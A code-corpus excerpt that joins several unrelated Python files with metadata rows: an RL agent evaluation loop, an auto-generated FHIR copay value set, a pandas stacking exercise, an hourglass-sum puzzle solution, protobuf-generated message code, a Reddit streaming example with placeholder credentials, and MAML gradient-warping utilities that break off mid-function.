def train(self, global_step):
raise NotImplementedError
def end_step(self):
raise NotImplementedError
def end_episode(self, episode, logger=None):
raise NotImplementedError
def evaluate_policy(self, env, eval_episodes=10, render=False, save_video=False, sleep=-1, results_dir='./save', timestep=-1):
if save_video:
from OpenGL import GL
#env = gym.wrappers.Monitor(env, directory='video',
# write_upon_reset=True, force=True, resume=True, mode='evaluation')
os.makedirs(f'{results_dir}/video/', exist_ok = True)
video = imageio.get_writer(f'{results_dir}/video/t{timestep}.mp4', fps=30)
render = False
success = 0
rewards = []
env.evaluate = True
with torch.no_grad():
for e in range(eval_episodes):
obs = env.reset()
fg = obs['desired_goal']
fg_dim = fg.shape[0]
s = obs['observation']
done = False
reward_episode_sum = 0
step = 0
self.set_final_goal(fg)
while not done:
if render:
if hasattr(self, 'sg'):
env.render(subgoal=self.sg+s[:self.sg.shape[0]]) #if possible render subgoal
else:
env.render()
if sleep>0:
time.sleep(sleep)
a, r, n_s, done = self.step(s, env, step)
reward_episode_sum += r
s = n_s
step += 1
self.end_step()
if save_video:
if hasattr(self, 'sg'):
video.append_data(env.render(subgoal=self.sg+s[:self.sg.shape[0]], mode='rgb_array'))
else:
video.append_data(env.render(mode='rgb_array'))
else:
error = np.sqrt(np.sum(np.square(fg-s[:fg_dim])))
print(" " * 80 + "\r" +
'[Eval] Goal, Curr: (%02.2f, %02.2f, %02.2f, %02.2f) Error:%.2f'%(fg[0], fg[1], s[0], s[1], error), end='\r')
rewards.append(reward_episode_sum)
success += 1 if error <=5 else 0
# this is not suited for every environment, distance should be adapted
self.end_episode(e)
if hasattr(env, 'viewer') and render:
v = env.viewer
#env.viewer = None
glfw.destroy_window(v.window)
#del v
env.evaluate = False
return np.array(rewards), success/eval_episodes
| en | 0.472823 | #!/usr/bin/python # _____________________________________________________________________________ # ---------------- # import libraries # ---------------- # standard libraries # ----- # utilities # ----- Abstract Agent Base Class #env = gym.wrappers.Monitor(env, directory='video', # write_upon_reset=True, force=True, resume=True, mode='evaluation') #if possible render subgoal # this is not suited for every environment, distance should be adapted #env.viewer = None #del v | 2.21742 | 2 |
spark_auto_mapper_fhir/value_sets/coverage_copay_type_codes.py | imranq2/SparkAutoMapper.FHIR | 1 | 6612373 | <gh_stars>1-10
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CoverageCopayTypeCodesCode(GenericTypeCode):
"""
CoverageCopayTypeCodes
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
This value set includes sample Coverage Copayment Type codes.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/CodeSystem/coverage-copay-type
"""
codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/coverage-copay-type"
class CoverageCopayTypeCodesCodeValues:
"""
An office visit for a general practitioner of a discipline.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
GPOfficeVisit = CoverageCopayTypeCodesCode("gpvisit")
"""
An office visit for a specialist practitioner of a discipline
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
SpecialistOfficeVisit = CoverageCopayTypeCodesCode("spvisit")
"""
An episode in an emergency department.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Emergency = CoverageCopayTypeCodesCode("emergency")
"""
An episode of an Inpatient hospital stay.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
InpatientHospital = CoverageCopayTypeCodesCode("inpthosp")
"""
A visit held where the patient is remote relative to the practitioner, e.g. by
phone, computer or video conference.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Tele_visit = CoverageCopayTypeCodesCode("televisit")
"""
A visit to an urgent care facility - typically a community care clinic.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
UrgentCare = CoverageCopayTypeCodesCode("urgentcare")
"""
A standard percentage applied to all classes or service or product not
otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayPercentage = CoverageCopayTypeCodesCode("copaypct")
"""
A standard fixed currency amount applied to all classes or service or product
not otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayAmount = CoverageCopayTypeCodesCode("copay")
"""
The accumulated amount of patient payment before the coverage begins to pay
for services.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Deductible = CoverageCopayTypeCodesCode("deductible")
"""
The maximum amout of payment for services which a patient, or family, is
expected to incur - typically annually.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
MaximumOutOfPocket = CoverageCopayTypeCodesCode("maxoutofpocket")
| from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class CoverageCopayTypeCodesCode(GenericTypeCode):
"""
CoverageCopayTypeCodes
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
This value set includes sample Coverage Copayment Type codes.
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/CodeSystem/coverage-copay-type
"""
codeset: FhirUri = "http://terminology.hl7.org/CodeSystem/coverage-copay-type"
class CoverageCopayTypeCodesCodeValues:
"""
An office visit for a general practitioner of a discipline.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
GPOfficeVisit = CoverageCopayTypeCodesCode("gpvisit")
"""
An office visit for a specialist practitioner of a discipline
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
SpecialistOfficeVisit = CoverageCopayTypeCodesCode("spvisit")
"""
An episode in an emergency department.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Emergency = CoverageCopayTypeCodesCode("emergency")
"""
An episode of an Inpatient hospital stay.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
InpatientHospital = CoverageCopayTypeCodesCode("inpthosp")
"""
A visit held where the patient is remote relative to the practitioner, e.g. by
phone, computer or video conference.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Tele_visit = CoverageCopayTypeCodesCode("televisit")
"""
A visit to an urgent care facility - typically a community care clinic.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
UrgentCare = CoverageCopayTypeCodesCode("urgentcare")
"""
A standard percentage applied to all classes or service or product not
otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayPercentage = CoverageCopayTypeCodesCode("copaypct")
"""
A standard fixed currency amount applied to all classes or service or product
not otherwise specified.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
CopayAmount = CoverageCopayTypeCodesCode("copay")
"""
The accumulated amount of patient payment before the coverage begins to pay
for services.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
Deductible = CoverageCopayTypeCodesCode("deductible")
"""
The maximum amout of payment for services which a patient, or family, is
expected to incur - typically annually.
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml
"""
MaximumOutOfPocket = CoverageCopayTypeCodesCode("maxoutofpocket") | en | 0.679782 | # This file is auto-generated by generate_classes so do not edit manually # noinspection PyPep8Naming CoverageCopayTypeCodes From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml This value set includes sample Coverage Copayment Type codes. http://terminology.hl7.org/CodeSystem/coverage-copay-type An office visit for a general practitioner of a discipline. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An office visit for a specialist practitioner of a discipline From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An episode in an emergency department. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml An episode of an Inpatient hospital stay. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A visit held where the patient is remote relative to the practitioner, e.g. by phone, computer or video conference. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A visit to an urgent care facility - typically a community care clinic. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A standard percentage applied to all classes or service or product not otherwise specified. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml A standard fixed currency amount applied to all classes or service or product not otherwise specified. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml The accumulated amount of patient payment before the coverage begins to pay for services. From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml The maximum amout of payment for services which a patient, or family, is expected to incur - typically annually. 
From: http://terminology.hl7.org/CodeSystem/coverage-copay-type in valuesets.xml | 1.999625 | 2 |
data_management/Excel Work/Stacking and Unstacking dataframes.py | TheRockerfly/JRocker-Portfolio | 0 | 6612374 | # -*- coding: utf-8 -*-
"""
Created on Sat Mar 17 06:07:26 2018
@author: James
"""
import pandas as pd
filename = ""
df = pd.read_csv(filename)
filename1 = ""
df1 = pd.read_csv(filename1)
# Stack the data (grouping the data)
# By stacking the data, we use less columns but more rows
df = df.stack(level="county")
print(df)
# Unstack
df = df.unstack(level="county")
print(df)
# By stacking and unstacking the data is stacked by different levels
# Now we are going to change the index using swaplevel
# Swap the levels of the index of newusers: newusers
df1 = df.swaplevel(0, 1)
# Print newusers and verify that the index is not sorted
print(df1)
# Sort the index of newusers: newusers
df1 = df1.sort_index()
# Print newusers and verify that the index is now sorted
print(df1)
# Test that the dataframe is equal to another
print(df.equals(df1))
| # -*- coding: utf-8 -*-
"""
Created on Sat Mar 17 06:07:26 2018
@author: James
"""
import pandas as pd
filename = ""
df = pd.read_csv(filename)
filename1 = ""
df1 = pd.read_csv(filename1)
# Stack the data (grouping the data)
# By stacking the data, we use less columns but more rows
df = df.stack(level="county")
print(df)
# Unstack
df = df.unstack(level="county")
print(df)
# By stacking and unstacking the data is stacked by different levels
# Now we are going to change the index using swaplevel
# Swap the levels of the index of newusers: newusers
df1 = df.swaplevel(0, 1)
# Print newusers and verify that the index is not sorted
print(df1)
# Sort the index of newusers: newusers
df1 = df1.sort_index()
# Print newusers and verify that the index is now sorted
print(df1)
# Test that the dataframe is equal to another
print(df.equals(df1))
| en | 0.822437 | # -*- coding: utf-8 -*- Created on Sat Mar 17 06:07:26 2018 @author: James # Stack the data (grouping the data) # By stacking the data, we use less columns but more rows # Unstack # By stacking and unstacking the data is stacked by different levels # Now we are going to change the index using swaplevel # Swap the levels of the index of newusers: newusers # Print newusers and verify that the index is not sorted # Sort the index of newusers: newusers # Print newusers and verify that the index is now sorted # Test that the dataframe is equal to another | 3.942086 | 4 |
matrix_array_sum/2d_grid_pattern_maxsum.py | codecakes/algorithms_monk | 0 | 6612375 | <reponame>codecakes/algorithms_monk<filename>matrix_array_sum/2d_grid_pattern_maxsum.py
#!/bin/python
"""
Context
Given a 2D Array, :
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation:
a b c
d
e f g
There are hourglasses in , and an hourglass sum is the sum of an hourglass' values.
Task
Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum.
Input Format
There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to .
Constraints
Output Format
Print the largest (maximum) hourglass sum found in .
Sample Input
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 2 4 4 0
0 0 0 2 0 0
0 0 1 2 4 0
Sample Output
19
Explanation
contains the following hourglasses:
1 1 1 1 1 0 1 0 0 0 0 0
1 0 0 0
1 1 1 1 1 0 1 0 0 0 0 0
0 1 0 1 0 0 0 0 0 0 0 0
1 1 0 0
0 0 2 0 2 4 2 4 4 4 4 0
1 1 1 1 1 0 1 0 0 0 0 0
0 2 4 4
0 0 0 0 0 2 0 2 0 2 0 0
0 0 2 0 2 4 2 4 4 4 4 0
0 0 2 0
0 0 1 0 1 2 1 2 4 2 4 0
The hourglass with the maximum sum () is:
2 4 4
2
1 2 4
"""
def max_pattern_sum(arr, lo, hi, N, bound=3):
mid = lo + (hi-lo)/2
if lo < hi:
return max(max_pattern_sum(arr, lo, mid, N), max_pattern_sum(arr, mid+1, hi, N))
elif mid <= N-bound:
return max([sum((sum(arr[mid][c:c+bound]), arr[mid+1][c+1], sum(arr[mid+2][c:c+bound]))) for c in xrange(N-bound+1)])
return float('-inf')
arr = []
for arr_i in xrange(6):
arr.append( map(int,raw_input().strip().split(' ')) )
N = len(arr)
print max_pattern_sum(arr, 0, N-1, N) | #!/bin/python
"""
Context
Given a 2D Array, :
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
0 0 0 0 0 0
We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation:
a b c
d
e f g
There are hourglasses in , and an hourglass sum is the sum of an hourglass' values.
Task
Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum.
Input Format
There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to .
Constraints
Output Format
Print the largest (maximum) hourglass sum found in .
Sample Input
1 1 1 0 0 0
0 1 0 0 0 0
1 1 1 0 0 0
0 0 2 4 4 0
0 0 0 2 0 0
0 0 1 2 4 0
Sample Output
19
Explanation
contains the following hourglasses:
1 1 1 1 1 0 1 0 0 0 0 0
1 0 0 0
1 1 1 1 1 0 1 0 0 0 0 0
0 1 0 1 0 0 0 0 0 0 0 0
1 1 0 0
0 0 2 0 2 4 2 4 4 4 4 0
1 1 1 1 1 0 1 0 0 0 0 0
0 2 4 4
0 0 0 0 0 2 0 2 0 2 0 0
0 0 2 0 2 4 2 4 4 4 4 0
0 0 2 0
0 0 1 0 1 2 1 2 4 2 4 0
The hourglass with the maximum sum () is:
2 4 4
2
1 2 4
"""
def max_pattern_sum(arr, lo, hi, N, bound=3):
mid = lo + (hi-lo)/2
if lo < hi:
return max(max_pattern_sum(arr, lo, mid, N), max_pattern_sum(arr, mid+1, hi, N))
elif mid <= N-bound:
return max([sum((sum(arr[mid][c:c+bound]), arr[mid+1][c+1], sum(arr[mid+2][c:c+bound]))) for c in xrange(N-bound+1)])
return float('-inf')
arr = []
for arr_i in xrange(6):
arr.append( map(int,raw_input().strip().split(' ')) )
N = len(arr)
print max_pattern_sum(arr, 0, N-1, N) | en | 0.723075 | #!/bin/python Context Given a 2D Array, : 1 1 1 0 0 0 0 1 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 We define an hourglass in to be a subset of values with indices falling in this pattern in 's graphical representation: a b c d e f g There are hourglasses in , and an hourglass sum is the sum of an hourglass' values. Task Calculate the hourglass sum for every hourglass in , then print the maximum hourglass sum. Input Format There are lines of input, where each line contains space-separated integers describing 2D Array ; every value in will be in the inclusive range of to . Constraints Output Format Print the largest (maximum) hourglass sum found in . Sample Input 1 1 1 0 0 0 0 1 0 0 0 0 1 1 1 0 0 0 0 0 2 4 4 0 0 0 0 2 0 0 0 0 1 2 4 0 Sample Output 19 Explanation contains the following hourglasses: 1 1 1 1 1 0 1 0 0 0 0 0 1 0 0 0 1 1 1 1 1 0 1 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 1 1 0 0 0 0 2 0 2 4 2 4 4 4 4 0 1 1 1 1 1 0 1 0 0 0 0 0 0 2 4 4 0 0 0 0 0 2 0 2 0 2 0 0 0 0 2 0 2 4 2 4 4 4 4 0 0 0 2 0 0 0 1 0 1 2 1 2 4 2 4 0 The hourglass with the maximum sum () is: 2 4 4 2 1 2 4 | 4.055578 | 4 |
src/indriya_msgs/python/projector_pb2.py | praveenv4k/Indriya | 1 | 6612376 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: projector.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import pose_pb2 as pose__pb2
# File-level descriptor for projector.proto. The serialized_pb argument is
# the wire-encoded FileDescriptorProto emitted by protoc; it must remain
# byte-identical, since the runtime parses all message/field metadata from it.
DESCRIPTOR = _descriptor.FileDescriptor(
  name='projector.proto',
  package='Indriya.Core.Msgs',
  #syntax='proto2',
  serialized_pb=_b('\n\x0fprojector.proto\x12\x11Indriya.Core.Msgs\x1a\npose.proto\"\xaa\x01\n\tProjector\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x0f\n\x07texture\x18\x02 \x01(\t\x12%\n\x04pose\x18\x03 \x01(\x0b\x32\x17.Indriya.Core.Msgs.Pose\x12\x12\n\x03\x66ov\x18\x04 \x01(\x01:\x05\x30.785\x12\x16\n\tnear_clip\x18\x05 \x01(\x01:\x03\x30.1\x12\x14\n\x08\x66\x61r_clip\x18\x06 \x01(\x01:\x02\x31\x30\x12\x15\n\x07\x65nabled\x18\x07 \x01(\x08:\x04true')
  ,
  dependencies=[pose__pb2.DESCRIPTOR,])
# Make this file's symbols resolvable through the default symbol database.
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
# Descriptor for the Indriya.Core.Msgs.Projector message.
# Field notes below are derived from the FieldDescriptor arguments:
# type=9 string, type=11 message, type=1 double, type=8 bool;
# label=2 required, label=1 optional (proto2 semantics).
_PROJECTOR = _descriptor.Descriptor(
  name='Projector',
  full_name='Indriya.Core.Msgs.Projector',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  fields=[
  # Field 1: required string name.
  _descriptor.FieldDescriptor(
    name='name', full_name='Indriya.Core.Msgs.Projector.name', index=0,
    number=1, type=9, cpp_type=9, label=2,
    has_default_value=False, default_value=_b("").decode('utf-8'),
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 2: optional string texture.
  _descriptor.FieldDescriptor(
    name='texture', full_name='Indriya.Core.Msgs.Projector.texture', index=1,
    number=2, type=9, cpp_type=9, label=1,
    has_default_value=False, default_value=_b("").decode('utf-8'),
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 3: optional message pose (Indriya.Core.Msgs.Pose; message_type is
  # wired to pose__pb2._POSE after this Descriptor is constructed).
  _descriptor.FieldDescriptor(
    name='pose', full_name='Indriya.Core.Msgs.Projector.pose', index=2,
    number=3, type=11, cpp_type=10, label=1,
    has_default_value=False, default_value=None,
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 4: optional double fov, default 0.785.
  _descriptor.FieldDescriptor(
    name='fov', full_name='Indriya.Core.Msgs.Projector.fov', index=3,
    number=4, type=1, cpp_type=5, label=1,
    has_default_value=True, default_value=0.785,
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 5: optional double near_clip, default 0.1.
  _descriptor.FieldDescriptor(
    name='near_clip', full_name='Indriya.Core.Msgs.Projector.near_clip', index=4,
    number=5, type=1, cpp_type=5, label=1,
    has_default_value=True, default_value=0.1,
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 6: optional double far_clip, default 10.
  _descriptor.FieldDescriptor(
    name='far_clip', full_name='Indriya.Core.Msgs.Projector.far_clip', index=5,
    number=6, type=1, cpp_type=5, label=1,
    has_default_value=True, default_value=10,
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  # Field 7: optional bool enabled, default True.
  _descriptor.FieldDescriptor(
    name='enabled', full_name='Indriya.Core.Msgs.Projector.enabled', index=6,
    number=7, type=8, cpp_type=7, label=1,
    has_default_value=True, default_value=True,
    message_type=None, enum_type=None, containing_type=None,
    is_extension=False, extension_scope=None,
    options=None),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  options=None,
  is_extendable=False,
  #syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=51,
  serialized_end=221,
)
_PROJECTOR.fields_by_name['pose'].message_type = pose__pb2._POSE
DESCRIPTOR.message_types_by_name['Projector'] = _PROJECTOR
Projector = _reflection.GeneratedProtocolMessageType('Projector', (_message.Message,), dict(
DESCRIPTOR = _PROJECTOR,
__module__ = 'projector_pb2'
# @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector)
))
_sym_db.RegisterMessage(Projector)
# @@protoc_insertion_point(module_scope)
| # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: projector.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import pose_pb2 as pose__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='projector.proto',
package='Indriya.Core.Msgs',
#syntax='proto2',
serialized_pb=_b('\n\x0fprojector.proto\x12\x11Indriya.Core.Msgs\x1a\npose.proto\"\xaa\x01\n\tProjector\x12\x0c\n\x04name\x18\x01 \x02(\t\x12\x0f\n\x07texture\x18\x02 \x01(\t\x12%\n\x04pose\x18\x03 \x01(\x0b\x32\x17.Indriya.Core.Msgs.Pose\x12\x12\n\x03\x66ov\x18\x04 \x01(\x01:\x05\x30.785\x12\x16\n\tnear_clip\x18\x05 \x01(\x01:\x03\x30.1\x12\x14\n\x08\x66\x61r_clip\x18\x06 \x01(\x01:\x02\x31\x30\x12\x15\n\x07\x65nabled\x18\x07 \x01(\x08:\x04true')
,
dependencies=[pose__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_PROJECTOR = _descriptor.Descriptor(
name='Projector',
full_name='Indriya.Core.Msgs.Projector',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='Indriya.Core.Msgs.Projector.name', index=0,
number=1, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='texture', full_name='Indriya.Core.Msgs.Projector.texture', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pose', full_name='Indriya.Core.Msgs.Projector.pose', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='fov', full_name='Indriya.Core.Msgs.Projector.fov', index=3,
number=4, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.785,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='near_clip', full_name='Indriya.Core.Msgs.Projector.near_clip', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=0.1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='far_clip', full_name='Indriya.Core.Msgs.Projector.far_clip', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=True, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enabled', full_name='Indriya.Core.Msgs.Projector.enabled', index=6,
number=7, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=True,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
#syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=51,
serialized_end=221,
)
_PROJECTOR.fields_by_name['pose'].message_type = pose__pb2._POSE
DESCRIPTOR.message_types_by_name['Projector'] = _PROJECTOR
Projector = _reflection.GeneratedProtocolMessageType('Projector', (_message.Message,), dict(
DESCRIPTOR = _PROJECTOR,
__module__ = 'projector_pb2'
# @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector)
))
_sym_db.RegisterMessage(Projector)
# @@protoc_insertion_point(module_scope)
| en | 0.474464 | # Generated by the protocol buffer compiler. DO NOT EDIT! # source: projector.proto # @@protoc_insertion_point(imports) #syntax='proto2', #syntax='proto2', # @@protoc_insertion_point(class_scope:Indriya.Core.Msgs.Projector) # @@protoc_insertion_point(module_scope) | 1.478034 | 1 |
example.py | JeremySimpson/redditstream | 0 | 6612377 | <reponame>JeremySimpson/redditstream
import logging
from stream import RedditStream
URL_REDDIT_ALL_SUBMISSIONS = 'https://oauth.reddit.com/r/all/new'
def main():
USERNAME = 'usename_here'
PASSWORD = '<PASSWORD>'
CLIENT_ID = 'client_id_here'
CLIENT_SECRET = 'client_secret_here'
USER_AGENT = 'your_user_agent'
logging.basicConfig()
rs = RedditStream(USERNAME, PASSWORD, CLIENT_ID, CLIENT_SECRET, USER_AGENT)
for e in rs.stream_listing(URL_REDDIT_ALL_SUBMISSIONS):
print e
if __name__ == '__main__':
main()
| import logging
from stream import RedditStream
URL_REDDIT_ALL_SUBMISSIONS = 'https://oauth.reddit.com/r/all/new'
def main():
USERNAME = 'usename_here'
PASSWORD = '<PASSWORD>'
CLIENT_ID = 'client_id_here'
CLIENT_SECRET = 'client_secret_here'
USER_AGENT = 'your_user_agent'
logging.basicConfig()
rs = RedditStream(USERNAME, PASSWORD, CLIENT_ID, CLIENT_SECRET, USER_AGENT)
for e in rs.stream_listing(URL_REDDIT_ALL_SUBMISSIONS):
print e
if __name__ == '__main__':
main() | none | 1 | 2.554448 | 3 | |
maml/utils.py | jdieter31/pytorch-maml | 0 | 6612378 | <reponame>jdieter31/pytorch-maml<filename>maml/utils.py
import torch
from collections import OrderedDict
from torchmeta.modules import MetaModule
from .model import BatchParameter
from .transformer_metric import TransformerMetric
from .constant_metric import ConstantMetric
from .expm import torch_expm as expm
def compute_accuracy(logits, targets):
"""Compute the accuracy"""
with torch.no_grad():
if logits.dim() == 2:
_, predictions = torch.max(logits, dim=1)
accuracy = torch.mean(predictions.eq(targets).float())
else:
_, predictions = torch.max(logits, dim=2)
accuracy = torch.mean(predictions.eq(targets).float(), dim=-1)
return accuracy.detach().cpu().numpy()
def tensors_to_device(tensors, device=torch.device('cpu')):
"""Place a collection of tensors in a specific device"""
if isinstance(tensors, torch.Tensor):
return tensors.to(device=device)
elif isinstance(tensors, (list, tuple)):
return type(tensors)(tensors_to_device(tensor, device=device)
for tensor in tensors)
elif isinstance(tensors, (dict, OrderedDict)):
return type(tensors)([(name, tensors_to_device(tensor, device=device))
for (name, tensor) in tensors.items()])
else:
raise NotImplementedError()
class ToTensor1D(object):
"""Convert a `numpy.ndarray` to tensor. Unlike `ToTensor` from torchvision,
this converts numpy arrays regardless of the number of dimensions.
Converts automatically the array to `float32`.
"""
def __call__(self, array):
return torch.from_numpy(array.astype('float32'))
def __repr__(self):
return self.__class__.__name__ + '()'
def make_warp_model(model, constant=False):
metric_params = []
for parameter in model.parameters():
if isinstance(parameter, BatchParameter):
metric_params.append(parameter)
"""
for layer in model.modules():
if isinstance(layer, BatchLinear):
metric_params.append(layer.weight)
"""
if constant:
return ConstantMetric(metric_params)
else:
return TransformerMetric(metric_params)
def kronecker_warp(grad, kronecker_matrices) -> torch.Tensor:
"""
Function for doing Kronecker based warping of gradient batches of an
m x n matrix parameter
Params:
grad (torch.Tensor): gradient batch of shape [meta_batch_size, batch_size m, n]
kronecker_matrices (Tuple[torch.Tensor, torch.Tensor]): kronecker
matrices to do the warping. First element of tuple is of shape
[meta_batch_size, batch_size n, n] second is of shape
[meta_batch_size, batch_size, m, m]
"""
input_matrices = kronecker_matrices[0]
output_matrices = kronecker_matrices[1]
all_matrices = input_matrices + output_matrices
grad = grad.sum(dim=-3)
grad_size = grad.size()
first_matrix = all_matrices[0]
first_matrix = first_matrix.view(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = grad.view(-1, all_matrices[1].size(-1), first_matrix.size(-1))
first_matrix = first_matrix.unsqueeze(1).expand(
first_matrix.size(0), temp.size(0) // first_matrix.size(0), *first_matrix.size()[1:]
).reshape(-1, first_matrix.size(-2), first_matrix.size(-1))
temp = torch.bmm(temp, first_matrix)
right_size = first_matrix.size(-1)
for i, matrix in enumerate(all_matrices[1:]):
matrix = matrix.view(-1, matrix.size(-2), matrix.size(-1))
matrix = matrix.unsqueeze(1).expand(
matrix.size(0), temp.size(0) // matrix.size(0), *matrix.size()[1:]
).reshape(-1, matrix.size(-2), matrix.size(-1))
temp = torch.bmm(matrix, temp)
if i < len(all_matrices) - 2:
right_size *= matrix.size(-1)
temp = temp.view(-1, all_matrices[i + 2].size(-1), right_size)
return temp.view(grad_size)
def gradient_update_parameters_warp(model,
loss,
params=None,
warp_model=None,
